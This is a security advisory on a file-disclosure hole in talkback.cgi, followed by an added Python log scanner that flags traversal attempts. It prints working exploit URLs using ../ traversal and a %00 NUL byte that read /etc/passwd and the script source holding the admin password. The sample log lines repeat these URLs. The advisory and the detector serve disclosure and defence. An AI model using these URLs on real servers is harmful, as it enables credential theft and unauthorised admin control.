Vulnerability
talkback.cgi
Affected
talkback.cgi
Description
Stan a.k.a. ThePike found the following. talkback.cgi may allow
remote users (website visitors) to view any file on a webserver
(depending on the user the webserver is running as).
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
This will display /etc/passwd (if the webserver user has
access to this file). Another URL can display the source of
talkback.cgi itself, which contains the admin password:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1
You might have to use another path instead of
../cgi-bin/talkback.cgi%00; this depends on where the cgi-bin is
installed. In this file you can find $admin_password, which can be
used in
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin
to post & delete articles.
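An added example (not from the original advisory or from Way To The Web): a log check that flags talkback.cgi requests whose article parameter decodes to a ../ path segment or a NUL byte (%00), including double-encoded forms. The log lines, addresses and function names are constructed for illustration, and a common-log-format access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = '''\
198.51.100.7 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/talkback.cgi?article=12&action=view&matchview=1 HTTP/1.0" 200 5120
198.51.100.9 - - [01/Jan/2001:10:00:05 +0000] "GET /cgi-bin/talkback.cgi?article=../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 200 1843
198.51.100.9 - - [01/Jan/2001:10:00:09 +0000] "GET /cgi-bin/talkback.cgi?article=..%252fcgi-bin%252ftalkback.cgi%2500&action=view HTTP/1.0" 200 20411
198.51.100.3 - - [01/Jan/2001:10:01:00 +0000] "GET /cgi-bin/other.cgi?article=../x HTTP/1.0" 404 210
'''

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252f) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value

def article_findings(request_target):
    """Return the reasons a talkback.cgi 'article' parameter looks like a file-read attempt."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/talkback.cgi"):
        return []
    reasons = set()
    for raw in parse_qs(parts.query, keep_blank_values=True).get("article", []):
        value = fully_decode(raw)  # parse_qs has already decoded once
        if "\x00" in value:
            reasons.add("NUL byte in article")
        if ".." in re.split(r"[\\/]", value):  # a whole path segment equal to ".."
            reasons.add("directory traversal in article")
    return sorted(reasons)

def scan_log(text):
    """Return (client address, reasons) for every flagged request line in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        reasons = article_findings(m.group(1)) if m else []
        if reasons:
            hits.append((line.split()[0], reasons))
    return hits

if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG):
        print(ip, reasons)
```

Only the query string is inspected, so parameters sent in a POST body do not appear in the access log and need a separate source.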
Solution
Way To The Web has released an updated version of talkback.cgi
that isn't vulnerable to this problem:
http://www.waytotheweb.com/webscripts/talkback.htm